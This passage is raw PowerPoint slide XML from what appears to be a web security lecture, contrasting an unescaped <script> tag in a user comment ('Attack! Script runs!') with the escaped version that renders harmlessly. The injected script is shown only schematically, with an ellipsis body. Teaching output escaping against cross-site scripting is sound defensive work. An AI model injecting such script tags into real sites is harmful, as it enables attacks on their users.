                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEC9390E-D051-A14A-98C2-B40CCACED2F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368425" y="4616131"/>
            <a:ext cx="985519" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>escaped</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0241B02-B50C-0343-BF0C-E5633F602A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1524000"/>
            <a:ext cx="2209800" cy="1754505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080">
              <a:alpha val="24705"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26670" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725" marR="1019175">
              <a:lnSpc>
                <a:spcPct val="100699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;  Comment:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="352425">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="352425">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="352425">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C78DAA-C8A0-754E-A214-0CA4D656D243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="4495800"/>
            <a:ext cx="2209800" cy="1754505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080">
              <a:alpha val="24705"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="46990" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725" marR="772795">
              <a:lnSpc>
                <a:spcPct val="93300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;  Comment:  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&amp;lt;script&amp;gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725" marR="685165">
              <a:lnSpc>
                <a:spcPct val="100699"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>…  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&amp;lt;/script&amp;gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCEFB2D8-7579-5B46-8AA2-4CB2FC8DD57F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5536692" y="1981200"/>
            <a:ext cx="1447800" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="748664">
                <a:moveTo>
                  <a:pt x="1323025" y="748629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124774" y="748629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="76206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1370774" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438302" y="77025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="124774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437994" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371593" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="748629"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="ECD882"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDED4C73-5CC5-084B-88C4-AFF5D0A12FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5536692" y="1981200"/>
            <a:ext cx="1447800" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="748664">
                <a:moveTo>
                  <a:pt x="0" y="124774"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9805" y="76206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1370774" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438302" y="77025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="124774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437994" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371593" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="748629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124774" y="748629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124774"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BDBF995-13E7-AF43-ADD5-BF57178CA1E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646262" y="2032985"/>
            <a:ext cx="1099185" cy="635000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>browser  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>rendering</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C89539-DCF1-3343-BED4-0736110BE23F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5536692" y="4852761"/>
            <a:ext cx="1447800" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="748664">
                <a:moveTo>
                  <a:pt x="1323025" y="748630"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124774" y="748630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="76206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1370774" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438302" y="77025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="124774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437994" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371593" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="748630"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="ECD882"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C68B4268-4D2C-6E47-A7CA-E950CB383B87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5536692" y="4852761"/>
            <a:ext cx="1447800" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="748664">
                <a:moveTo>
                  <a:pt x="0" y="124774"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9805" y="76206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1370774" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="36545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438302" y="77025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="124774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437994" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411254" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371593" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1323025" y="748630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124774" y="748630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76206" y="738824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36545" y="712084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="672423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="623855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124774"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0472CF31-7463-C246-880F-7439CCF2692B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646262" y="4904547"/>
            <a:ext cx="928369" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68FF3336-5EC0-A142-A88D-BD96E96F3E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646262" y="5209347"/>
            <a:ext cx="1099185" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>rendering</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1769270F-B8E6-1F44-97FC-24FB740B19DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7260209" y="2018896"/>
            <a:ext cx="1515110" cy="635000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attack!</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>runs!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1500CFEC-DAB1-764E-BBED-96D737BEF3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7379207" y="4743270"/>
            <a:ext cx="1460500" cy="1200785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="28575" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Comment:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
